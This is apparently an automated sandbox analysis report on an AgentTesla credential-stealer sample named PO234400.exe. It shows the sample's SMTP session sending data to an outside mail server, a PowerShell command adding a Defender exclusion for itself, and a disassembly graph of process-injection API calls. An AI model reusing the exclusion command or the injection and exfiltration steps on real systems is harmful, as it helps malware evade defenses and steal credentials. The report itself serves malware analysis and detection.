                                                  Mar 18, 2024 14:30:28.068140984 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.241786003 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.241801977 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.242046118 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.427967072 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.428138971 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.600712061 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.600796938 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.601602077 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.601602077 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.601692915 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.601777077 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:28.774682045 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.775456905 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.822397947 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:32:06.916631937 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:32:07.129497051 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:32:07.290652037 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:32:07.290838957 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:32:07.291032076 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:32:07.463706970 CET58749708199.79.62.115192.168.2.8

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 18, 2024 14:30:26.565315962 CET5918953192.168.2.81.1.1.1
                                                  Mar 18, 2024 14:30:26.924618959 CET53591891.1.1.1192.168.2.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Mar 18, 2024 14:30:26.565315962 CET192.168.2.81.1.1.10xb14eStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Mar 18, 2024 14:30:26.924618959 CET1.1.1.1192.168.2.80xb14eNo error (0)mail.mbarieservicesltd.commbarieservicesltd.comCNAME (Canonical name)IN (0x0001)false
                                                  Mar 18, 2024 14:30:26.924618959 CET1.1.1.1192.168.2.80xb14eNo error (0)mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false

                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Mar 18, 2024 14:30:27.378134012 CET58749708199.79.62.115192.168.2.8220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 19:00:27 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Mar 18, 2024 14:30:27.378813982 CET49708587192.168.2.8199.79.62.115EHLO 760639
                                                  Mar 18, 2024 14:30:27.551665068 CET58749708199.79.62.115192.168.2.8250-md-54.webhostbox.net Hello 760639 [191.96.227.194]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPECONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Mar 18, 2024 14:30:27.552731037 CET49708587192.168.2.8199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                  Mar 18, 2024 14:30:27.725832939 CET58749708199.79.62.115192.168.2.8334 UGFzc3dvcmQ6
                                                  Mar 18, 2024 14:30:28.067830086 CET58749708199.79.62.115192.168.2.8235 Authentication succeeded
                                                  Mar 18, 2024 14:30:28.068140984 CET49708587192.168.2.8199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                  Mar 18, 2024 14:30:28.241801977 CET58749708199.79.62.115192.168.2.8250 OK
                                                  Mar 18, 2024 14:30:28.242046118 CET49708587192.168.2.8199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                  Mar 18, 2024 14:30:28.427967072 CET58749708199.79.62.115192.168.2.8250 Accepted
                                                  Mar 18, 2024 14:30:28.428138971 CET49708587192.168.2.8199.79.62.115DATA
                                                  Mar 18, 2024 14:30:28.600796938 CET58749708199.79.62.115192.168.2.8354 Enter message, ending with "." on a line by itself
                                                  Mar 18, 2024 14:30:28.601777077 CET49708587192.168.2.8199.79.62.115.
                                                  Mar 18, 2024 14:30:28.775456905 CET58749708199.79.62.115192.168.2.8250 OK id=1rmD4O-000rDB-1f
                                                  Mar 18, 2024 14:32:06.916631937 CET49708587192.168.2.8199.79.62.115QUIT
                                                  Mar 18, 2024 14:32:07.290652037 CET58749708199.79.62.115192.168.2.8221 md-54.webhostbox.net closing connection

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:14:30:23
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0xa60000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0x3b0000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0x130000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0xe50000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:7
                                                  Start time:14:30:26
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff605670000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.9%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:157
                                                    Total number of Limit Nodes:16
                                                    execution_graph 24566 12c4668 24567 12c467a 24566->24567 24568 12c4686 24567->24568 24570 12c4778 24567->24570 24571 12c479d 24570->24571 24575 12c4878 24571->24575 24579 12c4888 24571->24579 24577 12c48af 24575->24577 24576 12c498c 24576->24576 24577->24576 24583 12c44b0 24577->24583 24580 12c48af 24579->24580 24581 12c44b0 CreateActCtxA 24580->24581 24582 12c498c 24580->24582 24581->24582 24584 12c5918 CreateActCtxA 24583->24584 24586 12c59db 24584->24586 24586->24586 24589 12cd438 24590 12cd47e GetCurrentProcess 24589->24590 24592 12cd4c9 24590->24592 24593 12cd4d0 GetCurrentThread 24590->24593 24592->24593 24594 12cd50d GetCurrentProcess 24593->24594 24595 12cd506 24593->24595 24596 12cd543 24594->24596 24595->24594 24597 12cd56b GetCurrentThreadId 24596->24597 24598 12cd59c 24597->24598 24599 7b1ad88 24600 7b1af13 24599->24600 24602 7b1adae 24599->24602 24602->24600 24603 7b1a87c 24602->24603 24604 7b1b008 PostMessageW 24603->24604 24605 7b1b074 24604->24605 24605->24602 24587 12cd680 DuplicateHandle 24588 12cd716 24587->24588 24606 12cacb0 24607 12cacbf 24606->24607 24610 12cada8 24606->24610 24618 12cad98 24606->24618 24611 12cadb9 24610->24611 24613 12caddc 24610->24613 24611->24613 24626 12cb040 24611->24626 24630 12cb031 24611->24630 24612 12cadd4 24612->24613 24614 12cafe0 GetModuleHandleW 24612->24614 24613->24607 24615 12cb00d 24614->24615 24615->24607 24619 12cadb9 24618->24619 24620 12caddc 24618->24620 24619->24620 24624 12cb040 LoadLibraryExW 24619->24624 24625 12cb031 LoadLibraryExW 24619->24625 24620->24607 24621 12cadd4 24621->24620 24622 12cafe0 GetModuleHandleW 24621->24622 24623 12cb00d 24622->24623 24623->24607 24624->24621 24625->24621 24627 12cb054 24626->24627 24629 12cb079 24627->24629 24634 12ca168 24627->24634 24629->24612 24631 12cb054 24630->24631 24632 12cb079 24631->24632 24633 12ca168 LoadLibraryExW 24631->24633 24632->24612 24633->24632 24636 12cb220 LoadLibraryExW 24634->24636 24637 12cb299 24636->24637 24637->24629 24638 7b196ce 24639 7b1965c 24638->24639 24641 7b196d1 24638->24641 24640 7b1968a 24639->24640 24655 7b19bb0 24639->24655 24660 7b1a028 24639->24660 24664 7b19ae9 24639->24664 24668 7b19c47 24639->24668 24672 7b1a1a4 24639->24672 24677 7b1a1de 24639->24677 24688 7b19cdf 24639->24688 24693 7b1a15d 24639->24693 24698 7b19fbb 24639->24698 24703 7b19c94 24639->24703 24708 7b19d94 24639->24708 24718 7b19bd5 24639->24718 24722 7b1a170 24639->24722 24656 7b19bb6 24655->24656 24727 7b17a10 24656->24727 24731 7b17a08 24656->24731 24657 7b19cc0 24657->24640 24735 7b17ac0 24660->24735 24739 7b17ab8 24660->24739 24661 7b1a042 24661->24640 24743 7b17ee0 24664->24743 24747 7b17ed4 24664->24747 24751 7b17c50 24668->24751 24755 7b17c58 24668->24755 24669 7b19c75 24669->24640 24673 7b1a1b6 24672->24673 24759 7b17b91 24673->24759 24763 7b17b98 24673->24763 24674 7b1a342 24678 7b1a1eb 24677->24678 24679 7b19d94 24677->24679 24680 7b1a06e 24679->24680 24681 7b19cab 24679->24681 24686 7b17ac0 Wow64SetThreadContext 24680->24686 24687 7b17ab8 Wow64SetThreadContext 24680->24687 24682 7b1a4ce 24681->24682 24684 7b17a10 ResumeThread 24681->24684 24685 7b17a08 ResumeThread 24681->24685 24683 7b19cc0 24683->24640 24684->24683 24685->24683 24686->24683 24687->24683 24689 7b19ce5 24688->24689 24691 7b17c50 WriteProcessMemory 24689->24691 24692 7b17c58 WriteProcessMemory 24689->24692 24690 7b19b41 24690->24640 24691->24690 24692->24690 24694 7b19cf6 24693->24694 24695 7b19b41 24693->24695 24696 7b17c50 WriteProcessMemory 24694->24696 24697 7b17c58 WriteProcessMemory 24694->24697 24695->24640 24696->24695 24697->24695 24699 7b19bce 24698->24699 24700 7b19cc0 24699->24700 24701 7b17a10 ResumeThread 24699->24701 24702 7b17a08 ResumeThread 24699->24702 24700->24640 24701->24700 24702->24700 24704 7b19c9a 24703->24704 24706 7b17a10 ResumeThread 24704->24706 24707 7b17a08 ResumeThread 24704->24707 24705 7b19cc0 24705->24640 24706->24705 24707->24705 24709 7b19da9 24708->24709 24710 7b1a06e 24709->24710 24711 7b19cab 24709->24711 24716 7b17ac0 Wow64SetThreadContext 24710->24716 24717 7b17ab8 Wow64SetThreadContext 24710->24717 24712 7b1a4ce 24711->24712 24714 7b17a10 ResumeThread 24711->24714 24715 7b17a08 ResumeThread 24711->24715 24713 7b19cc0 24713->24640 24714->24713 24715->24713 24716->24713 24717->24713 24767 7b17d40 24718->24767 24771 7b17d48 24718->24771 24719 7b19b9f 24723 7b1a179 24722->24723 24724 7b19f1b 24723->24724 24725 7b17c50 WriteProcessMemory 24723->24725 24726 7b17c58 WriteProcessMemory 24723->24726 24725->24723 24726->24723 24728 7b17a50 ResumeThread 24727->24728 24730 7b17a81 24728->24730 24730->24657 24732 7b17a50 ResumeThread 24731->24732 24734 7b17a81 24732->24734 24734->24657 24736 7b17b05 Wow64SetThreadContext 24735->24736 24738 7b17b4d 24736->24738 24738->24661 24740 7b17b05 Wow64SetThreadContext 24739->24740 24742 7b17b4d 24740->24742 24742->24661 24744 7b17f69 CreateProcessA 24743->24744 24746 7b1812b 24744->24746 24748 7b17f69 CreateProcessA 24747->24748 24750 7b1812b 24748->24750 24752 7b17ca0 WriteProcessMemory 24751->24752 24754 7b17cf7 24752->24754 24754->24669 24756 7b17ca0 WriteProcessMemory 24755->24756 24758 7b17cf7 24756->24758 24758->24669 24760 7b17bd8 VirtualAllocEx 24759->24760 24762 7b17c15 24760->24762 24762->24674 24764 7b17bd8 VirtualAllocEx 24763->24764 24766 7b17c15 24764->24766 24766->24674 24768 7b17d93 ReadProcessMemory 24767->24768 24770 7b17dd7 24768->24770 24770->24719 24772 7b17d93 ReadProcessMemory 24771->24772 24774 7b17dd7 24772->24774 24774->24719

                                                    Executed Functions

                                                    Function 07B1BAF0 Relevance: .4, Instructions: 406COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1cf3f4c4a35f86db9c9bfe4194627eb891b60d8724c9884dbf182b13e75d9e72
                                                    • Instruction ID: c5a931156205807928aafcf8c22de2c59f32c2e3a38ba97637d795da74b24149
                                                    • Opcode Fuzzy Hash: 1cf3f4c4a35f86db9c9bfe4194627eb891b60d8724c9884dbf182b13e75d9e72
                                                    • Instruction Fuzzy Hash: 74E1BAF17016058FEB29DB75C454BAFB7F6EF89600F9484ADD1469B290DB34E802CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B12951 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50a4d47f6932a42d30ba301ecc33f19c384cca80655da3296a387ed764d74995
                                                    • Instruction ID: 7cf6e4ce8ba4ca70d58be5109b60e544d54c02bc3c1710a18002a2d4b6af9cf1
                                                    • Opcode Fuzzy Hash: 50a4d47f6932a42d30ba301ecc33f19c384cca80655da3296a387ed764d74995
                                                    • Instruction Fuzzy Hash: 77410BB1E10219CBEB04CFA9C9447DEFBB6BF89300F55C166D408B7254DB346985CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CD429 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD4B6
                                                    • GetCurrentThread.KERNEL32 ref: 012CD4F3
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD530
                                                    • GetCurrentThreadId.KERNEL32 ref: 012CD589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ec52930c1a941fa5f618d59fd46ed07c3183b044c3e48e35f93fa1579bfb2198
                                                    • Instruction ID: 1572706b2501289fd19240a6d7f5042db9913c0debef62bf9ce1a5b7b25fa84d
                                                    • Opcode Fuzzy Hash: ec52930c1a941fa5f618d59fd46ed07c3183b044c3e48e35f93fa1579bfb2198
                                                    • Instruction Fuzzy Hash: E35166B09003498FEB14DFAAD548BEEBBF1BF88314F20856DD509A7290DB345945CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CD438 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD4B6
                                                    • GetCurrentThread.KERNEL32 ref: 012CD4F3
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD530
                                                    • GetCurrentThreadId.KERNEL32 ref: 012CD589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ad76d14539d7c0206963b19ae2c7c6401dc401dd821838257816e2680fe9bda7
                                                    • Instruction ID: ee97bc3cc0a0c710f9a9f13a3e17cadf7bc6f0a5c4c68271377e6b53b9d794cf
                                                    • Opcode Fuzzy Hash: ad76d14539d7c0206963b19ae2c7c6401dc401dd821838257816e2680fe9bda7
                                                    • Instruction Fuzzy Hash: 3F5137B09003098FDB14DFAAD548BAEBBF1FF88314F20856DD519A7350DB346945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17ED4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 44 7b17ed4-7b17f75 46 7b17f77-7b17f81 44->46 47 7b17fae-7b17fce 44->47 46->47 48 7b17f83-7b17f85 46->48 52 7b17fd0-7b17fda 47->52 53 7b18007-7b18036 47->53 50 7b17f87-7b17f91 48->50 51 7b17fa8-7b17fab 48->51 54 7b17f93 50->54 55 7b17f95-7b17fa4 50->55 51->47 52->53 57 7b17fdc-7b17fde 52->57 63 7b18038-7b18042 53->63 64 7b1806f-7b18129 CreateProcessA 53->64 54->55 55->55 56 7b17fa6 55->56 56->51 58 7b18001-7b18004 57->58 59 7b17fe0-7b17fea 57->59 58->53 61 7b17fec 59->61 62 7b17fee-7b17ffd 59->62 61->62 62->62 66 7b17fff 62->66 63->64 65 7b18044-7b18046 63->65 75 7b18132-7b181b8 64->75 76 7b1812b-7b18131 64->76 67 7b18069-7b1806c 65->67 68 7b18048-7b18052 65->68 66->58 67->64 70 7b18054 68->70 71 7b18056-7b18065 68->71 70->71 71->71 72 7b18067 71->72 72->67 86 7b181c8-7b181cc 75->86 87 7b181ba-7b181be 75->87 76->75 89 7b181dc-7b181e0 86->89 90 7b181ce-7b181d2 86->90 87->86 88 7b181c0 87->88 88->86 92 7b181f0-7b181f4 89->92 93 7b181e2-7b181e6 89->93 90->89 91 7b181d4 90->91 91->89 94 7b18206-7b1820d 92->94 95 7b181f6-7b181fc 92->95 93->92 96 7b181e8 93->96 97 7b18224 94->97 98 7b1820f-7b1821e 94->98 95->94 96->92 100 7b18225 97->100 98->97 100->100
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B18116
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: abfad5575574b858dd53d05099efed63677ce5bdb1a41317d63d4d77b6c66e1f
                                                    • Instruction ID: a4f3ab541974a40cfd892571cc0f7ebb206286b9c70d3156ef331ed98369a013
                                                    • Opcode Fuzzy Hash: abfad5575574b858dd53d05099efed63677ce5bdb1a41317d63d4d77b6c66e1f
                                                    • Instruction Fuzzy Hash: 62A14AB1D0065ACFEB24DF68C8417EEBBB2FF48320F5585A9D808A7240DB759985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17EE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 101 7b17ee0-7b17f75 103 7b17f77-7b17f81 101->103 104 7b17fae-7b17fce 101->104 103->104 105 7b17f83-7b17f85 103->105 109 7b17fd0-7b17fda 104->109 110 7b18007-7b18036 104->110 107 7b17f87-7b17f91 105->107 108 7b17fa8-7b17fab 105->108 111 7b17f93 107->111 112 7b17f95-7b17fa4 107->112 108->104 109->110 114 7b17fdc-7b17fde 109->114 120 7b18038-7b18042 110->120 121 7b1806f-7b18129 CreateProcessA 110->121 111->112 112->112 113 7b17fa6 112->113 113->108 115 7b18001-7b18004 114->115 116 7b17fe0-7b17fea 114->116 115->110 118 7b17fec 116->118 119 7b17fee-7b17ffd 116->119 118->119 119->119 123 7b17fff 119->123 120->121 122 7b18044-7b18046 120->122 132 7b18132-7b181b8 121->132 133 7b1812b-7b18131 121->133 124 7b18069-7b1806c 122->124 125 7b18048-7b18052 122->125 123->115 124->121 127 7b18054 125->127 128 7b18056-7b18065 125->128 127->128 128->128 129 7b18067 128->129 129->124 143 7b181c8-7b181cc 132->143 144 7b181ba-7b181be 132->144 133->132 146 7b181dc-7b181e0 143->146 147 7b181ce-7b181d2 143->147 144->143 145 7b181c0 144->145 145->143 149 7b181f0-7b181f4 146->149 150 7b181e2-7b181e6 146->150 147->146 148 7b181d4 147->148 148->146 151 7b18206-7b1820d 149->151 152 7b181f6-7b181fc 149->152 150->149 153 7b181e8 150->153 154 7b18224 151->154 155 7b1820f-7b1821e 151->155 152->151 153->149 157 7b18225 154->157 155->154 157->157
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B18116
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: a932189fc5c48a00af2604ce362b5275bb9f3586eb71ad10c1fa9c0793cdda98
                                                    • Instruction ID: 5359f6f06d230c2616516c5cc11d14647d500126dd21ff31aa947d14d082ab1b
                                                    • Opcode Fuzzy Hash: a932189fc5c48a00af2604ce362b5275bb9f3586eb71ad10c1fa9c0793cdda98
                                                    • Instruction Fuzzy Hash: EF916CB1D0065ACFEB14DF68C8417EEBBB2FF48320F5585A9D808A7240DB759985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CADA8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 158 12cada8-12cadb7 159 12cadb9-12cadc6 call 12c93d4 158->159 160 12cade3-12cade7 158->160 167 12caddc 159->167 168 12cadc8 159->168 161 12cade9-12cadf3 160->161 162 12cadfb-12cae3c 160->162 161->162 169 12cae3e-12cae46 162->169 170 12cae49-12cae57 162->170 167->160 215 12cadce call 12cb040 168->215 216 12cadce call 12cb031 168->216 169->170 171 12cae59-12cae5e 170->171 172 12cae7b-12cae7d 170->172 176 12cae69 171->176 177 12cae60-12cae67 call 12ca110 171->177 175 12cae80-12cae87 172->175 173 12cadd4-12cadd6 173->167 174 12caf18-12caf94 173->174 208 12caf96-12cafbe 174->208 209 12cafc0-12cafd8 174->209 179 12cae89-12cae91 175->179 180 12cae94-12cae9b 175->180 178 12cae6b-12cae79 176->178 177->178 178->175 179->180 182 12cae9d-12caea5 180->182 183 12caea8-12caeb1 call 12ca120 180->183 182->183 189 12caebe-12caec3 183->189 190 12caeb3-12caebb 183->190 191 12caec5-12caecc 189->191 192 12caee1-12caeee 189->192 190->189 191->192 194 12caece-12caede call 12ca130 call 12ca140 191->194 198 12caef0-12caf0e 192->198 199 12caf11-12caf17 192->199 194->192 198->199 208->209 210 12cafda-12cafdd 209->210 211 12cafe0-12cb00b GetModuleHandleW 209->211 210->211 212 12cb00d-12cb013 211->212 213 12cb014-12cb028 211->213 212->213 215->173 216->173
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAFFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 0adb76fa8a99f50b0a314c82fe592c5216e64bff57b3c3a0219de377994921ae
                                                    • Instruction ID: bd769808322bc6665b22ef5174046c17241946c35947ac0ae43dfa1f5d3747ba
                                                    • Opcode Fuzzy Hash: 0adb76fa8a99f50b0a314c82fe592c5216e64bff57b3c3a0219de377994921ae
                                                    • Instruction Fuzzy Hash: DC816970A10B0A8FD724DF69D4417AABBF1BF88704F008A2DD246D7651E775E846CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012C44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 217 12c44b0-12c59d9 CreateActCtxA 220 12c59db-12c59e1 217->220 221 12c59e2-12c5a3c 217->221 220->221 228 12c5a3e-12c5a41 221->228 229 12c5a4b-12c5a4f 221->229 228->229 230 12c5a60 229->230 231 12c5a51-12c5a5d 229->231 232 12c5a61 230->232 231->230 232->232
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fd4b1ae37587d5c800844de868db9ea815de23eaf17b7b157310234c0cd46292
